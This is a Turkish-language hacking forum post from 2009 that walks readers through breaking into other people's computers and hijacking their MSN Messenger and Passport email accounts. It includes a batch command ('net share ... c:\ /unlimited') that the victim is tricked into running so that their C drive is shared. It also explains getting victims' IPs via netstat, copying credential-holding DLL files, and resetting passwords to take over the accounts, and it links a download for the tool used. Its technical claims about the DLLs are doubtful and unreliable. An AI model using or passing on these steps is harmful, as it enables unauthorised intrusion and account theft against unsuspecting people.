Real Felaket

Web Sitemiden Yararlana Bilmek İçin Lütfen Üye Olunuz
Real Felaket

Pc Hack ve Pc Hack sayesinde Msn Hack

Paylaş

Paradiz
    G.K BAŞKANI
    G.K BAŞKANI

Pc Hack ve Pc Hack sayesinde Msn Hack

Mesaj tarafından Paradiz Bir Paz Haz. 21, 2009 12:09 am

Evet Şimdi Başlayalım:
    Size şimdi mail hackde çağır açacak bir yöntem anlatacağım.Bu uygulamayı gerçekleştirebilmek için 3 uygulamayı bilmemiz gerekiyor.Bir tanesi Essential Tools ile Paylaşımları acık PC lere girmek , diğeri paylaşımları kapalı olan PC ler paylaşıma açmak bir diğeri ise IP msn den karsıdakinin Ip numarasını almak Şimdi bu 3 yöntemide teker teker anlatacağım ve bulduğum mail hack yöntemine geçeceğim.

1. yöntem(Essential Tools İle Pc lere girmek)
    Bir kaynaktan bularak Essential Tools programını PC mize yüklüyoruz.Sonra Msn de konuşurken karsı PC nın IP numarasını alarak Essential Tools'u acıyoruz Ve NBSCAN bölümüne giriyoruz PC gözükünce Sağ tıklayıp open computer diyoruz.(Paylaşımı acık pc lerde)

2.Yöntem(Paylaşımları kapalı pc leri paylaşıma açmak)
    Evet arkadaşlar karsıdaki pc nın paylaşımı kapalı ise paylaşıma şu kodları bir not defterine yazıp '' .bat '' uzantısına çevirerek karsı PC ye açtırmamız gerekiyor.Açtırınca IP yi alıp EssentiaL tools ile PC ye dalacaz.

---------------------------------------------------
    Kod:
    net share hacker=c:\ /unlimited /remark:"RockStar"

----------------------------------------------------------
    Bu kodlar karsı PC de C diskini paylaşıma acar...

3.Yöntem (Msn 'den IP numarası almak)
    Msn'den IP almayı genellikle bilir herkes ama ben yinede yazayım dedim.Msn den karsı PC ile konuşurken MS-DOS'u acıyoruz ve MS-DOS'a Şu komutu yazıyoruz...
    Kod:
    netstat -n

Sonra Birkaç IP numarası gelecek yanında established yazanlardan birisi karşı IP 'dir.

Evet şimdi yöntemimize geçiş yapıyoruz:
    1.Yöntem (basit olanı):
    Karşımızdaki kurbanımız Cafede ise işimiz kolay olacaktır çünkü PC paylaşıma acıktır acık olmasa bile dosyaları kullanamasak da ulaşabiliriz.İlk önce kurbanımızla msn den konuşurken MS-DOS ^'dan IP alma yöntemi ile kurban IP adresini alıyoruz.Sonra Essential Tools programı ile karsı PC ye dalıyoruz.Ve Msn Messenger klasöründeki 3 tane '' .dll '' uzantılı dosyayı alıyoruz.Ve PC'mizdeki Msn Messenger klasörüne yapıştırıyoruz.Ondan sonra oturum kapıyoruz oturumu bir daha açmaya girince kurban msn adresi yazıyor ve şifre kendiliğinden yazılmış şekilde çıkıyor ve bize sadece oturum aç demek düşüyor.Sonra şifreyi bilmediğimizden dolayı www.passport.com 'dan kendimize bir e-posta sıfırlama iletisi atıyoruz ve parola sıfırlıyoruz.Ondan sonra yeni parolamızla passport.com dan olabildiğince çabuk hesap hizmetlerine giriyoruz gizli soru diğer e-posta adresi değiştiriyoruz sonra mail bizim oluyor .

2.Yöntem (zor olanı)
    Eğer karşı PC evden bağlanıyorsa verdiğim 2. yöntemdeki karşı PC yi paylaşıma açma kodlarını bat uzantılı dosyaya cevirim karsı PC ye yollayacağız.Karşı PC bunu acınca C diski paylaşıma açılacak ondan sonra Ip sını alıp Essential Tools ile dalıp DLL dosyalarını alacağız sonra kendimize kopyalayacağız.Sonra Msn oturumu kapayıp bir daha açacağız bir bakacağız kurban msn adresi şifre sormadan sızın mail adresinin oturumunu açmanıza izin veriyor.Oturum aç diyeceksiniz ve sonra www.passport.com 'dan parola sıfırlama iletisi gönderip şifreyi değişeceksiniz sonra MAİL sizin olacak

Şimdi size bu ' dll ' dosyalarının ne işe yaradığını bu yöntemi nerden bulduğumu ne kadar işe yaradığını anlatacağım.
    Dll uzantılı dosyalar MSN programı kullanılırken sürekli çalışan programlar MSN 'de yaptığınız işlevleri baştan beri güncelleyerek oturumu kapayana dek kaydediyor.Yanı şifre yazıldığı anda şifreyi de içeriğine alıyor.Sürekli güncellendiği için 2-5 kb arası ufak bir boyutta ve 3 tane var.Ben bu yöntemi rastgele buldum Bir kez msn deyken MSN yanıt vermiyor oldu ve görev yöneticisine gırdım bir baktım MSN klasörünün içindeki 3 küçük boyuttaki DLL dosyası sürekli çalışıyor ne olduğunu merak ettim.İlk önce kafeye bir arkadaşı yolladım ve bana o dll dosyalarını yollamasını istedim yolladı kendime kopyaladım değiştirdim bendekilerle oturum kapadım açacaktım bir daha bir baktım arkadasın mail adresi yazıyor ve şifrede ****** şeklinde yazıyordu oturum aç dedim tak diye arkadasın mailine gırdım

Ayrıca bu PC hack ve mail hack kardeşliği olmuştur iki yöntem birleşerek bu işlev yapılır

Essential Tools indirmek içinn
    http://dosyam.net/?id=nfc69j

Forum Saati Salı Şub. 21, 2017 1:59 pm